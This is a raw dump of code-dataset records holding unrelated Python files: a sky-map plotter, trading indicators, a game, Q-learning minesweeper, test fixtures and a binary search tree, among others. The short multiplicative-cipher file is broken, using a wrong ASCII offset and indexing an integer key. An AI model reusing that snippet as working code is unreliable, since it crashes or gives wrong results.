-hori_border_conic/2:\r\n df.x[i+1] = numpy.nan\r\n MW_line_list_conic.append([(df.x[i]+360,df.y[i]),(df.x[i+1],df.y[i+1])])\r\n MW_line_list_conic.append([(df.x[i],df.y[i]),(df.x[i+1]-360,df.y[i+1])])\r\n else:\r\n MW_line_list_conic.append([(df.x[i],df.y[i]),(df.x[i+1],df.y[i+1])])\r\n\r\nlc_MW_conic = mc.LineCollection(MW_line_list_conic, colors='b',alpha=plot_alpha, zorder=1+2.5)\r\nax0.add_collection(lc_MW_conic)\r\n\r\n# boundary\r\nboundary.x = list(map(transform_x_conic, boundary.RA*15, boundary.Dec)) #convert RA to degrees\r\nboundary.y = list(map(transform_y_conic, boundary.RA*15, boundary.Dec))\r\n\r\nboundary_line_list_conic = []\r\nfor i in range(len(boundary)-1):\r\n if boundary.Constellation[i] == boundary.Constellation[i+1]:\r\n if boundary.x[i]-boundary.x[i+1] > hori_border_conic/2:\r\n boundary.x[i] = numpy.nan\r\n boundary_line_list_conic.append([(boundary.x[i]-360,boundary.y[i]),(boundary.x[i+1],boundary.y[i+1])])\r\n boundary_line_list_conic.append([(boundary.x[i],boundary.y[i]),(boundary.x[i+1]+360,boundary.y[i+1])])\r\n elif boundary.x[i]-boundary.x[i+1] < -hori_border_conic/2:\r\n boundary.x[i+1] = numpy.nan\r\n boundary_line_list_conic.append([(boundary.x[i]+360,boundary.y[i]),(boundary.x[i+1],boundary.y[i+1])])\r\n boundary_line_list_conic.append([(boundary.x[i],boundary.y[i]),(boundary.x[i+1]-360,boundary.y[i+1])])\r\n else:\r\n boundary_line_list_conic.append([(boundary.x[i],boundary.y[i]),(boundary.x[i+1],boundary.y[i+1])])\r\n\r\nlc_boundary_conic = mc.LineCollection(boundary_line_list_conic, colors=[1,0.5,0,0.15],alpha=plot_alpha/4, zorder=1+2.5)\r\nax0.add_collection(lc_boundary_conic)\r\n\r\n#Mars\r\nDT_UTC = ts.utc(2019,12,range(31,31+365*2),16,0,0)\r\nDT_HK = DT_UTC.astimezone(tz)\r\n\r\nmra,mdec,mau = (earth+hokoon[0]).at(DT_UTC).observe(mars).radec()\r\n\r\nmars_x = list(map(transform_x_conic, mra.hours*15, mdec.degrees))\r\nmars_y = list(map(transform_y_conic, mra.hours*15, mdec.degrees))\r\n\r\nfor i in range(len(mau.au)-1):\r\n if -1 < mars_x[i]-mars_x[i+1] < 1: #roughly shorter than diameter of inner circle\r\n plt.plot([mars_x[i],mars_x[i+1]],[mars_y[i],mars_y[i+1]],'g-',zorder=1)\r\n \r\n#plt.plot(mars_x,mars_y,'g-',zorder=1)\r\n\r\nfor i in range(17):\r\n plt.scatter(mars_x[279+i*5],mars_y[279+i*5])\r\n\r\n##DD = 279\r\n##print(DT_HK[DD],DT_HK[DD+5],DT_HK[DD+10],DT_HK[DD+15],DT_HK[DD+20],DT_HK[DD+25],DT_HK[DD+30],DT_HK[DD+35],DT_HK[DD+40],\r\n## DT_HK[DD+45],DT_HK[DD+50],DT_HK[DD+55],DT_HK[DD+60],DT_HK[DD+65],DT_HK[DD+70],DT_HK[DD+75],DT_HK[DD+80],DT_HK[DD+85])\r\n#plt.savefig('destination_path.eps', format='eps')\r\nplt.show()\r\n\r\n","sub_path":"skymap_conic.py","file_name":"skymap_conic.py","file_ext":"py","file_size_in_byte":42657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"377122815","text":"import math\nimport pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing\nfrom IPython import embed\nimport random\nimport itertools\nimport talib as ta\n\nNON_NORMALIZE_COLUMNS = ['open', 'high', 'low', 'close', 'volume', 'flag']\n\n\ndef generate_data(args, df, delay, tick, flag_threshold, df_original=None):\n df = fix_error_row(df)\n df = calc_flag(df, delay, flag_threshold)\n df = calc_technicals(args, df, tick)\n df = calc_volume_technicals(args, df, tick)\n df = clip_outlier(args, df)\n df, df_real_price = add_change_rate(args, df)\n df = normalize_technicals(df)\n df = drop_unnecessary_columns(df)\n df = move_obj_value_to_tail(df)\n df = delete_correlate_columns(args, df, df_original)\n return df, df_real_price\n\n\ndef delete_correlate_columns(args, df, df_original):\n if args['delete_correlate_columns']:\n if df_original is None:\n df_corr = df.iloc[:, :-1].corr()\n df_not_correlated = ~(df_corr.mask(np.tril(np.ones([len(df_corr)]*2, dtype=bool))).abs() > args['delete_correlate_columns']).any()\n un_corr_idx = df_not_correlated.loc[df_not_correlated[df_not_correlated.index] == True].index\n df_out = df.iloc[:, :-1][un_corr_idx]\n return pd.concat([df_out, df.iloc[:, -1]], axis=1)\n else:\n columns = list(df_original.columns)\n columns.remove('adf flag')\n return pd.concat([df[columns], df.iloc[:, -1]], axis=1)\n else:\n return df\n\n\ndef move_obj_value_to_tail(df):\n df['adf flag'] = df['flag'].copy()\n df.drop(['flag'], 1, inplace=True)\n return df\n\n\ndef drop_unnecessary_columns(df):\n df.drop(['open', 'high', 'low', 'close', 'volume'], 1, inplace=True)\n return df\n\n\ndef normalize_technicals(df):\n min_max_scaler = preprocessing.MinMaxScaler()\n\n for column_name, item in df.iteritems():\n if column_name in NON_NORMALIZE_COLUMNS:\n continue\n df[column_name] = min_max_scaler.fit_transform(df[column_name].values.reshape(-1,1))\n\n return df\n\n\ndef add_change_rate(args, df):\n df_real_price = df.copy()\n\n prev_close = df['close'].shift(1)\n df['close_change_rate'] = df['close']\n df['close_change_rate'] /= prev_close\n\n prev_volume = df['volume'].shift(1)\n df['volume_change_rate'] = df['volume']\n df['volume_change_rate'] /= prev_volume\n\n df.replace([np.inf, -np.inf], np.nan, inplace=True)\n df.fillna(0, inplace=True)\n return df, df_real_price\n\n\ndef clip_outlier(args, df):\n threshold = args['threshold_outlier']\n for column_name, item in df.iteritems():\n if column_name in NON_NORMALIZE_COLUMNS:\n continue\n lower, upper = np.percentile(df[column_name].values,\n [threshold, 100 - threshold])\n df[column_name] = df[column_name].clip(lower, upper)\n\n return df\n\n\ndef calc_volume_technicals(args, df, tick):\n tick_seconds = tick * 60\n\n ## MovingAverage(Daily)\n MA3 = df.volume.rolling(window=3*60//tick*24).mean()\n MA5 = df.volume.rolling(window=5*60//tick*24).mean()\n MA10 = df.volume.rolling(window=10*60//tick*24).mean()\n MA25 = df.volume.rolling(window=25*60//tick*24).mean()\n df['vol_3MA_diff_percent_day'] = (MA3 - df['volume']) / df['volume']\n df['vol_5MA_diff_percent_day'] = (MA5 - df['volume']) / df['volume']\n df['vol_10MA_diff_percent_day'] = (MA10 - df['volume']) / df['volume']\n df['vol_25MA_diff_percent_day'] = (MA25 - df['volume']) / df['volume']\n\n df['vol_3MA_5MA_diff_day'] = df['vol_3MA_diff_percent_day'] - df['vol_5MA_diff_percent_day']\n df['vol_5MA_10MA_diff_day'] = df['vol_5MA_diff_percent_day'] - df['vol_10MA_diff_percent_day']\n df['vol_5MA_25MA_diff_day'] = df['vol_5MA_diff_percent_day'] - df['vol_25MA_diff_percent_day']\n df.fillna(0, inplace=True)\n\n return df\n\n\ndef calc_technicals(args, df, tick):\n tick_seconds = tick * 60\n open = np.array(df.open, dtype='f8')\n high = np.array(df.high, dtype='f8')\n low = np.array(df.low, dtype='f8')\n close = np.array(df.close, dtype='f8')\n volume = np.array(df.volume, dtype='f8')\n\n day_of_week = df.index.map(lambda x: x.weekday())\n df['day_of_week_sin'] = day_of_week.map(lambda x: math.sin(math.radians(x/7*360)))\n df['day_of_week_cos'] = day_of_week.map(lambda x: math.cos(math.radians(x/7*360)))\n\n df['high_low'] = df['high'] - df['low']\n df['high_low'] /= df['close']\n df['open_low'] = df['open'] - df['low']\n df['open_low'] /= df['close']\n df['open_high'] = df['open'] - df['high']\n df['open_high'] /= df['close']\n\n #################### MovingAverage\n ## Daily\n for i in [3, 5, 10, 25, 75, 200]:\n sma = ta.SMA(close, timeperiod=i*60//tick*24)\n df[str(i) + 'MA_diff_percent_day'] = (sma - df['close']) / df['close']\n\n for i, j in itertools.combinations([3, 5, 10, 25], 2):\n new_column = str(i) + 'MA_' + str(j) + 'MA_diff_day'\n column_1 = str(i) + 'MA_diff_percent_day'\n column_2 = str(j) + 'MA_diff_percent_day'\n df[new_column] = df[column_1] - df[column_2]\n for k in range(1, 2): # 3でも大丈夫かもだが大差ない\n new_column_2 = str(i) + 'MA_' + str(j) + 'MA_diff_day_before' + str(k)\n df[new_column_2] = df[new_column].shift(k) - df[new_column]\n df.fillna(0, inplace=True)\n\n #################### Momentum\n ## Momentum\n for i in [3, 5, 10, 20]:\n Mom_period = i * 60 // tick * 24\n shift = df.close.shift(Mom_period)\n df['Mom' + str(i)] = df.close / shift * 100\n\n\n #################### Bolinger / MACD\n for i in [3, 9, 20, 25, 50]:\n base = df.close.rolling(window=i*60//tick*24).mean()\n sigma = df.close.rolling(window=i*60//tick*24).std(ddof=0)\n upper_1sigma = base + 1 * sigma\n lower_1sigma = base - 1 * sigma\n upper_2sigma = base + 2 * sigma\n lower_2sigma = base - 2 * sigma\n df[str(i) + 'MAbb_upper_1sigma_diff_percent'] = (upper_1sigma - df['close']) / df['close']\n df[str(i) + 'MAbb_lower_1sigma_diff_percent'] = (lower_1sigma - df['close']) / df['close']\n df[str(i) + 'MAbb_upper_2sigma_diff_percent'] = (upper_2sigma - df['close']) / df['close']\n df[str(i) + 'MAbb_lower_2sigma_diff_percent'] = (lower_2sigma - df['close']) / df['close']\n\n ## MACD\n FastEMA_period = 12*60//tick*24\n SlowEMA_period = 26*60//tick*24\n SignalSMA_period = 9*60//tick*24\n df['MACD'] = df.close.ewm(span=FastEMA_period).mean() - df.close.ewm(span=SlowEMA_period).mean()\n df['Signal'] = df['MACD'].rolling(window=SignalSMA_period).mean()\n df['MACD_Signal_diff'] = df['MACD'] - df['Signal']\n\n #################### RSI / HLBand / Stoch\n ## RSI\n for i in [5, 10, 14, 30]:\n RSI_period = i*60//tick*24\n one_day_before = 1*60//tick*24\n diff = df.close.diff(one_day_before)\n positive = diff.clip_lower(0).ewm(alpha=1/RSI_period).mean()\n negative = diff.clip_upper(0).ewm(alpha=1/RSI_period).mean()\n df['RSI' + str(i)] = 100 - 100 / (1 - positive / negative)\n\n ## HLband\n for i in [3, 7, 20, 40]:\n period = i*60//tick*24\n Hline = df.close.rolling(period).max()\n Lline = df.close.rolling(period).min()\n df['Hline_diff_percent_' + str(i)] = (Hline - df['close']) / df['close']\n df['Lline_diff_percent_' + str(i)] = (Lline - df['close']) / df['close']\n\n df.fillna(0, inplace=True)\n\n ## Stochastics\n Kperiod = 14*60//tick*24 # %K\n Dperiod = 3*60//tick*24 # %D\n Slowing = 3*60//tick*24\n Hline = df.high.rolling(Kperiod).max()\n Lline = df.low.rolling(Kperiod).min()\n sumlow = (df.close - Lline).rolling(Slowing).sum()\n sumhigh = (Hline - Lline).rolling(Slowing).sum()\n df['Stoch_day'] = sumlow / sumhigh * 100\n df['StochSignal_day'] = df['Stoch_day'].rolling(Dperiod).mean()\n df.fillna(0, inplace=True)\n\n #################### VIX / Ichimoku\n\n # VIX\n import collections\n def vixfix(close, low, high, period=22, bbl=20, mult=2.0, lb=50, ph=0.85, pl=1.01):\n period = period # LookBack Period Standard Deviation High\n bbl = bbl # Bolinger Band Length\n mult = mult # Bollinger Band Standard Devaition Up\n lb = lb # Look Back Period Percentile High\n ph = ph # Highest Percentile - 0.90=90%, 0.95=95%, 0.99=99%\n pl = pl # Lowest Percentile - 1.10=90%, 1.05=95%, 1.01=99%\n hp = False # Show High Range - Based on Percentile and LookBack Period?\n sd = False # Show Standard Deviation Line?\n # VixFix\n wvf = (close.rolling(period, 1).max() - low) / close.rolling(period, 1).max() * 100\n # VixFix_inverse\n wvf_inv = abs((close.rolling(period, 1).min() - high) / close.rolling(period, 1).min() * 100)\n sDev = mult * pd.Series(wvf).rolling(bbl, 1).std()\n midLine = pd.Series(wvf).rolling(bbl, 1).mean()\n lowerBand = midLine - sDev\n upperBand = midLine + sDev\n rangeHigh = pd.Series(wvf).rolling(lb, 1).max() * ph\n rangeLow = pd.Series(wvf).rolling(lb, 1).min() * pl\n result = collections.namedtuple('result', 'wvf, wvf_inv, lowerBand, upperBand, rangeHigh,rangeLow')\n return result(wvf=wvf, wvf_inv=wvf_inv, lowerBand=lowerBand, upperBand=upperBand,\n rangeHigh=rangeHigh, rangeLow=rangeLow)\n\n vix = vixfix(close=df.close, low=df.low, high=df.high)\n df['vix_wvf'] = vix.wvf\n df['vix_wvf_inv'] = vix.wvf_inv\n\n # Ichimoku\n band9_period = 9*24*60*60 // tick_seconds\n Hline9 = df.close.rolling(band9_period).max()\n Lline9 = df.close.rolling(band9_period).min()\n change_line = ( Hline9 + Lline9 ) / 2\n\n band26_period = 26*24*60*60 // tick_seconds\n Hline26 = df.close.rolling(band26_period).max()\n Lline26 = df.close.rolling(band26_period).min()\n standart_line = ( Hline26 + Lline26 ) / 2\n\n span1_line = (change_line + standart_line) / 2\n\n band52_period = 52*24*60*60 // tick_seconds\n Hline52 = df.close.rolling(band52_period).max()\n Lline52 = df.close.rolling(band52_period).min()\n span2_line = ( Hline52 + Lline52 ) / 2\n\n df['Ichimoku_change_line_diff_percent'] = (change_line - df['close']) / df['close']\n df['Ichimoku_standart_line_diff_percent'] = (standart_line - df['close']) / df['close']\n df['Ichimoku_span1_line_diff_percent'] = (span1_line - df['close']) / df['close']\n df['Ichimoku_span2_line_diff_percent'] = (span2_line - df['close']) / df['close']\n\n #################### TA-Lib params (Volatility)\n df['NATR_1day'] = ta.NATR(high, low, close, timeperiod=14*60//tick*24)\n for i in [1, 2]:\n new_column_name = 'NATR_' + str(i) + 'days_before_diff'\n df[new_column_name] = df['NATR_1day'] - df['NATR_1day'].shift(i*60//tick*24)\n\n #################### TA-Lib params (Mom系)\n adxr = ta.ADXR(high, low, close, timeperiod=14*60//tick*24)\n adx = ta.ADX(high, low, close, timeperiod=14*60//tick*24)\n df['ADX_ADXR_diff'] = adx - adxr\n\n #################### TA-Lib params (Other)\n df['HT_SINE'], df['leadsine'] = ta.HT_SINE(close)\n df['BETA'] = ta.BETA(high, low, timeperiod=5*60//tick*24)\n df['CORREL'] = ta.CORREL(high, low, timeperiod=30*60//tick*24)\n\n #################### RCI\n def ord(seq, idx, itv):\n p = seq[idx]\n o = 1\n for i in range(0, itv):\n if p < seq[i]:\n o = o + 1\n return o\n\n def d(itv, src):\n sum = 0.0\n for i in range(0, itv):\n sum = sum + pow((i + 1) - ord(src, i, itv), 2)\n return sum\n\n def calc_rci(itv, src):\n rciM = (1.0 - 6.0 * d(itv,src) / (itv * (itv * itv - 1.0))) * 100.0\n return rciM\n\n def get_rci(period_rci, close):\n rank_period = np.arange(period_rci, 0, -1)\n close_len = len(close)\n rci = np.zeros(close_len)\n for i in range(close_len - period_rci + 1):\n rci[-i-1] = calc_rci(period_rci, close[close_len - period_rci - i : close_len - i])\n return rci\n\n for period in [9, 36]:\n df['RCI_' + str(period)] = get_rci(period, df.close.tolist())\n\n df.replace([np.inf, -np.inf], np.nan, inplace=True)\n df.fillna(0, inplace=True)\n\n return df\n\n\ndef calc_flag(df, delay, flag_threshold):\n def check_change(changeHigh_series, changeLow_series):\n change = []\n changeHigh, changeLow = changeHigh_series.tolist(), changeLow_series.tolist()\n for i in range(len(changeHigh)):\n if changeHigh[i] >= (1 + flag_threshold) and \\\n changeLow[i] < (1 - flag_threshold):\n if (changeHigh[i] - 1) >= (1 - changeLow[i]):\n change.append(2)\n else:\n change.append(1)\n elif changeHigh[i] >= (1 + flag_threshold):\n change.append(2)\n elif changeLow[i] < (1 - flag_threshold):\n change.append(1)\n else:\n change.append(0)\n return change\n\n rollingHigh = df.high.rolling(window=delay).max()\n rollingLow = df.low.rolling(window=delay).min()\n changeHigh = rollingHigh.shift(-1*delay)\n changeLow = rollingLow.shift(-1*delay)\n changeHigh /= df['close']\n changeLow /= df['close']\n\n df['flag'] = check_change(changeHigh, changeLow)\n df.dropna(inplace=True)\n return df\n\n\ndef fix_error_row(df):\n df.drop(df[df['low'] < 20].index, axis=0, inplace=True)\n return df\n","sub_path":"src/generate_data.py","file_name":"generate_data.py","file_ext":"py","file_size_in_byte":13426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"177932997","text":"import regex as re\n\nfrom typing import List\n\nfrom pycode2seq.inference.common.node import Node\n\n\nTECHNICAL_TOKEN_KEY = \"technical_token\"\nDEFAULT_TOKEN = \"EMPTY_TOKEN\"\n\n\ndef do_traverse_pre_order(node: Node, result: List[Node]):\n result.append(node)\n for child in node.children:\n do_traverse_pre_order(child, result)\n\n\ndef pre_order(root: Node) -> List[Node]:\n result = []\n do_traverse_pre_order(root, result)\n return result\n\n\ndef set_node_technical_token(node: Node, token: str):\n node.metadata[TECHNICAL_TOKEN_KEY] = token\n\n\ndef normalize_token(token: str, default: str) -> str:\n clean_token = re.sub(\"\\\\P{Print}\", \"\", re.sub(\"[\\\"',]\", \"\", re.sub(\"//s+\", \"\", re.sub(\"\\\\\\\\n\", \"\", token.lower()))))\n\n stripped = re.sub(\"[^A-Za-z]\", \"\", clean_token)\n\n if not stripped:\n careful_stripped = clean_token.replace(\" \", \"_\")\n if not careful_stripped:\n return default\n return careful_stripped\n\n return stripped\n\n\ndef split_to_subtokens(token: str) -> List[str]:\n splitted = re.split(\"(?<=[a-z])(?=[A-Z])|_|[0-9]|(?<=[A-Z])(?=[A-Z][a-z])|\\\\s+\", token.strip())\n return [normalize_token(token, \"\") for token in splitted if token]\n","sub_path":"pycode2seq/inference/common/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"278092976","text":"from __future__ import annotations\n\nimport os\nfrom threading import Timer\nfrom typing import List\n\nimport snecs\nfrom snecs import Component\n\nfrom scripts.engine import chronicle, state, utility, world\nfrom scripts.engine.component import Aesthetic, Position, WinCondition\nfrom scripts.engine.core.constants import ASSET_PATH, SAVE_PATH, GameState, RenderLayer, UIElement\nfrom scripts.engine.core.data import store\nfrom scripts.engine.core.definitions import ActorData, TraitSpritePathsData\nfrom scripts.engine.systems import vision\nfrom scripts.engine.ui.manager import ui\nfrom scripts.engine.world_objects.game_map import GameMap\n\n__all__ = [\"initialise_game\", \"goto_character_select\", \"load_game\", \"exit_game\", \"win_game\"]\n\n\ndef initialise_game():\n \"\"\"\n Init the game`s required info\n \"\"\"\n state.set_new(GameState.MENU)\n ui.set_element_visibility(UIElement.TITLE_SCREEN, True)\n\n\ndef goto_character_select():\n \"\"\"\n Create a new game\n \"\"\"\n ui.set_element_visibility(UIElement.CHARACTER_SELECTOR, True)\n\n\ndef start_game(player_data: ActorData):\n \"\"\"\n Create a new game and show the gamemap\n \"\"\"\n # create clean snecs.world\n empty_world = snecs.World()\n world.move_world(empty_world)\n\n # init and save map\n game_map = GameMap(\"cave\", 10)\n store.current_game_map = game_map\n\n # populate the map\n game_map.generate_new_map(player_data)\n\n # init the player\n player = world.get_player()\n\n # create win condition and place next to player\n player_pos = world.get_entitys_component(player, Position)\n win_x = player_pos.x + 1\n win_y = player_pos.y\n components: List[Component] = []\n components.append(Position((win_x, win_y))) # lets hope this doesnt spawn in a wall\n components.append(WinCondition())\n traits_paths = [TraitSpritePathsData(idle=str(ASSET_PATH / \"world/win_flag.png\"))]\n sprites = utility.build_sprites_from_paths(traits_paths)\n components.append(Aesthetic(sprites.idle, sprites, traits_paths, RenderLayer.ACTOR, (win_x, win_y)))\n world.create_entity(components)\n\n # tell places about the player\n chronicle.set_turn_holder(player)\n\n # create a god\n world.create_god(\"the_small_gods\")\n\n # show the in game screens\n ui.set_element_visibility(UIElement.CAMERA, True)\n ui.set_element_visibility(UIElement.MESSAGE_LOG, True)\n ui.set_element_visibility(UIElement.SKILL_BAR, True)\n\n # welcome message\n ui.create_screen_message(\"Welcome to Not Quite Paradise\")\n\n # FIXME - entities load before camera so they cant get their screen position.\n # If ui loads before entities then it fails due to player not existing. Below is a hacky fix.\n for entity, (aesthetic, position) in world.get_components([Aesthetic, Position]):\n assert isinstance(aesthetic, Aesthetic)\n assert isinstance(position, Position)\n aesthetic.draw_x, aesthetic.draw_y = (position.x, position.y)\n aesthetic.target_draw_x = aesthetic.draw_x\n aesthetic.target_draw_y = aesthetic.draw_y\n\n # entities load with a blank fov, update them now\n vision.process_light_map()\n vision.process_fov()\n vision.process_tile_visibility()\n\n # point the camera at the player, now that FOV is updated\n pos = world.get_entitys_component(player, Position)\n camera = ui.get_element(UIElement.CAMERA)\n camera.set_target((pos.x, pos.y), True)\n\n # loading finished, give player control\n state.set_new(GameState.GAMEMAP)\n\n # prompt turn actions\n chronicle.end_turn(player, 0)\n\n\ndef load_game():\n \"\"\"\n Load existing game state\n \"\"\"\n full_save_path = str(SAVE_PATH)\n for save_name in os.listdir(full_save_path):\n save = save_name.replace(\".json\", \"\")\n state.load_game(save)\n break\n\n # show the in game screens\n ui.set_element_visibility(UIElement.CAMERA, True)\n ui.set_element_visibility(UIElement.MESSAGE_LOG, True)\n ui.set_element_visibility(UIElement.SKILL_BAR, True)\n\n # welcome message\n ui.create_screen_message(\"Welcome back to Not Quite Paradise\")\n\n # loading finished, give player control\n state.set_new(GameState.GAMEMAP)\n\n\ndef exit_game():\n \"\"\"\n Exit the game\n \"\"\"\n state.set_new(GameState.EXITING)\n\n\ndef quit_to_title():\n \"\"\"\n Quit out of the game back to the title screen\n \"\"\"\n state.set_new(GameState.MENU)\n\n # hide the in game screens\n ui.set_element_visibility(UIElement.CAMERA, False)\n ui.set_element_visibility(UIElement.MESSAGE_LOG, False)\n ui.set_element_visibility(UIElement.SKILL_BAR, False)\n\n # show the title screen\n ui.set_element_visibility(UIElement.TITLE_SCREEN, True)\n\n\ndef win_game():\n \"\"\"\n Trigger the win game actions\n \"\"\"\n state.set_new(GameState.MENU)\n ui.create_screen_message(\"You wonned. Huzzah.\")\n\n # quit to main menu after a few seconds\n timer = Timer(2.0, quit_to_title)\n timer.start()\n","sub_path":"scripts/nqp/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":4898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"327711055","text":"# (Alphabet number * key)mod(total number of alphabets)\n\nASC_A = 40\nWIDTH = 26\n\ndef unshift(key, ch):\n offset = ord(ch) - ASC_A\n return chr(((key[0] * (offset + key[1])) % WIDTH) + ASC_A)\n\nkey = 7\n\nprint(\"Multiplicative Cipher is\")\nprint(unshift(key, 'A'))\n","sub_path":"multiplicativeCipher.py","file_name":"multiplicativeCipher.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"324868551","text":"#!/usr/bin/env python3\nimport time\nfrom random import randint\nimport qLearnAgent\nimport pygame\nimport gui\nimport state\n\ngui_board = gui.MineSweeperGui(None)\n\n# gui_board.show()\n# gui_board.update()\nprint(\" start \")\nfinish = False\nmyAgent = qLearnAgent.QLearnAgent()\nis_run =True\nspeed = 1.0\n\nwhile True:\n speed_scale = 1.0\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n elif event.type == pygame.MOUSEBUTTONDOWN:\n is_run,speed_scale = gui_board.mouseDown(pygame.mouse.get_pos())\n if not is_run:\n continue\n if speed/speed_scale != 0:\n speed = speed/speed_scale\n gui_board.speed =speed\n time.sleep(speed)\n x, y = myAgent.choose_action(gui_board.game_map)\n action_tuple = (x, y)\n last_map_id = state.get_id_from_map(gui_board.game_map)\n res, reward = gui_board.select_tile(action_tuple)\n next_state_id = state.get_id_from_map(gui_board.game_map)\n new_value = myAgent.update_q_value(last_state_id=last_map_id, action=action_tuple,\n next_state_id=next_state_id, reward=reward,next_map=gui_board.game_map)\n\n if res == -1:\n time.sleep(speed/10)\n gui_board.restart_game()\n finish = True\n elif res == 2:\n gui_board.restart_game()\n finish = True\n # time.sleep(5)\n gui_board.update_q_value(myAgent.q_matrix[next_state_id])\n","sub_path":"Codes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"505115163","text":"import os\nfrom mako.template import Template\n\n\nclass UserCreateResource:\n def on_get(self, req, resp):\n \"\"\"Handles GET requests\"\"\"\n\n resp.content_type = 'text/html'\n\n dir_path = os.path.dirname(os.path.realpath(__file__))\n user_create_template = Template(\n filename=dir_path + '/user_create_view.mako')\n resp.body = user_create_template.render()\n","sub_path":"pom_tracker/views/user_create.py","file_name":"user_create.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"225400757","text":"\"\"\"Common test tools.\"\"\"\nfrom datetime import timedelta\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom openpeerpower.components import rfxtrx\nfrom openpeerpower.components.rfxtrx import DOMAIN\nfrom openpeerpower.util.dt import utcnow\n\nfrom tests.common import MockConfigEntry, async_fire_time_changed\nfrom tests.components.light.conftest import mock_light_profiles # noqa: F401\n\n\ndef create_rfx_test_cfg(device=\"abcd\", automatic_add=False, devices=None):\n \"\"\"Create rfxtrx config entry data.\"\"\"\n return {\n \"device\": device,\n \"host\": None,\n \"port\": None,\n \"automatic_add\": automatic_add,\n \"debug\": False,\n \"devices\": devices,\n }\n\n\n@pytest.fixture(autouse=True, name=\"rfxtrx\")\nasync def rfxtrx_fixture(opp):\n \"\"\"Fixture that cleans up threads from integration.\"\"\"\n\n with patch(\"RFXtrx.Connect\") as connect, patch(\"RFXtrx.DummyTransport2\"):\n rfx = connect.return_value\n\n async def _signal_event(packet_id):\n event = rfxtrx.get_rfx_object(packet_id)\n await opp.async_add_executor_job(\n rfx.event_callback,\n event,\n )\n\n await opp.async_block_till_done()\n await opp.async_block_till_done()\n return event\n\n rfx.signal = _signal_event\n\n yield rfx\n\n\n@pytest.fixture(name=\"rfxtrx_automatic\")\nasync def rfxtrx_automatic_fixture(opp, rfxtrx):\n \"\"\"Fixture that starts up with automatic additions.\"\"\"\n entry_data = create_rfx_test_cfg(automatic_add=True, devices={})\n mock_entry = MockConfigEntry(domain=\"rfxtrx\", unique_id=DOMAIN, data=entry_data)\n\n mock_entry.add_to_opp(opp)\n\n await opp.config_entries.async_setup(mock_entry.entry_id)\n await opp.async_block_till_done()\n await opp.async_start()\n yield rfxtrx\n\n\n@pytest.fixture\nasync def timestep(opp):\n \"\"\"Step system time forward.\"\"\"\n\n with patch(\"openpeerpower.core.dt_util.utcnow\") as mock_utcnow:\n mock_utcnow.return_value = utcnow()\n\n async def delay(seconds):\n \"\"\"Trigger delay in system.\"\"\"\n mock_utcnow.return_value += timedelta(seconds=seconds)\n async_fire_time_changed(opp, mock_utcnow.return_value)\n await opp.async_block_till_done()\n\n yield delay\n","sub_path":"tests/components/rfxtrx/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"508336359","text":"from django.db import models\nfrom django.utils.translation import ugettext as _\n\n\nclass AdSource(models.TextChoices):\n OLX = 'olx', _('olx.uz')\n AVTOELON = 'avtoelon', _('avtoelon.uz')\n\n\nclass TransmissionType(models.TextChoices):\n AUTOMATIC = 'automatic', _('Автоматическая')\n MANUAL = 'manual', _('Механическая')\n OTHER = 'other', _('Другая')\n\n\nclass VehicleCondition(models.TextChoices):\n PERFECT = 'perfect', _('Отличное')\n GOOD = 'good', _('Хорошее')\n MEDIOCRE = 'mediocre', _('Среднее')\n NEEDS_REPAIRS = 'needs_repairs', _('Требует ремонта')\n","sub_path":"apps/vehicle/enums.py","file_name":"enums.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"352591054","text":"N = int(input())\nblue = 0\nred = 0\nfor _ in range(N):\n S = input()\n for s in S:\n if s == 'R':\n red += 1\n elif s == 'B':\n blue += 1\n\nif blue < red:\n print('TAKAHASHI')\nelif red < blue:\n print('AOKI')\nelse:\n print('DRAW')\n","sub_path":"AtCoder/arc/040a.py","file_name":"040a.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"469175318","text":"# A utility class that represents an individual node in a Binary Search Tree\nclass Node: \n def __init__(self,key): \n self.left = None\n self.right = None\n self.val = key \n\n\n\n\n\"\"\"\n(a) Inorder (Left, Root, Right) : 4 2 5 1 3\n(b) Preorder (Root, Left, Right) : 1 2 4 5 3\n(c) Postorder (Left, Right, Root) : 4 5 2 3 1\n\"\"\"\n\n\n# Binary Search Tree Find with the give value to search for\ndef search(root,key): \n\t\n\t# Base Cases: root is null or key is present at root \n\tif root is None or root.val == key: \n\t\treturn root \n\n\t# Key is greater than root's key \n\tif root.val < key: \n\t\treturn search(root.right,key) \n\t\n\t# Key is smaller than root's key \n\treturn search(root.left,key) \n\n\n# A utility function to insert a new node with the given key \ndef insert(root,node): \n\tif root is None: \n\t\troot = node \n\telse: \n\t\tif root.val < node.val: \n\t\t\tif root.right is None: \n\t\t\t\troot.right = node \n\t\t\telse: \n\t\t\t\tinsert(root.right, node) \n\t\telse: \n\t\t\tif root.left is None: \n\t\t\t\troot.left = node \n\t\t\telse: \n\t\t\t\tinsert(root.left, node) \n\n\n\n","sub_path":"algorithms/bs_tree.py","file_name":"bs_tree.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} 